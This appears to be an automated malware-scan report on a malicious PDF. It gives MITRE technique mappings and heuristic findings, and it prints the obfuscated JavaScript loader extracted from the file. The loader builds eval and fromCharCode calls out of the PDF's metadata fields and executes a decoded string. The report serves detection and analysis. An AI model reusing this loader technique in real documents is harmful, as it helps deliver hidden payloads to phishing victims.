MALICIOUS
114
Risk Score
Malware Insights
MITRE ATT&CK
T1059.007 JavaScript
T1203 Exploitation for Client Execution
T1566.001 Spearphishing Attachment
The PDF document contains embedded JavaScript, identified by heuristics as an exploit cluster. The JavaScript code appears to be obfuscated but attempts to construct and execute a string, likely to download and run a second-stage payload. The use of String.fromCharCode and JavaScript within a PDF strongly suggests an attempt to exploit vulnerabilities for client execution, often delivered via spearphishing.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 3
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0001_000.js42a103b379236d0b650d8e2c7e0e4ebf8277f31539a74e1e7441fc41750a5c1c |
pdf-javascript-stream | PDF /JS object 1 at offset 0x45A4 | 372 bytes |
Preview scriptFirst 1,000 lines of the extracted script
var w = 4;
var ycbqn = this.title.replace(/w/g,'*w,');
ycbqn = ycbqn.replace(/t/g,'2');
ycbqn=ycbqn.substr(0,ycbqn.length-2) + ']';
nxii=function(){return function(){return this}()}();
liwet=nxii[this.subject];
cpvvr=liwet(this.producer);
cflo = liwet(ycbqn);
var s = '';
for (i = 0; i < cflo.length; i++) {
pzkj = cflo[i];
s += cpvvr(pzkj);
}
liwet(s);
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.